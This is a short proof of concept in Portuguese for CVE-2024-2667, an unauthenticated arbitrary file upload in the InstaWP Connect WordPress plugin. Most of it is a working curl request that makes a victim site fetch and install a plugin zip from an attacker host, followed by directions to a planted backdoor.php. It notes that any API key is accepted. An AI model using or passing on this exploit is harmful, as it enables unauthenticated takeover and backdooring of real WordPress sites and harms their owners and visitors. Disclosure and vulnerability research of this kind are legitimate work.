
Este é o POC para CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Upload de arquivo arbitrário não autenticado)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> Você pode usar qualquer chave de API válida ou inválida.
override_plugin_zip -> Caminho para o arquivo zip que contém um Plugin WordPress malicioso com uma backdoor.
Uma vez importado, você pode acessar a backdoor via http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (Supondo que o nome do diretório seja malicious-plugin e backdoor.php esteja nesse diretório)
Referências: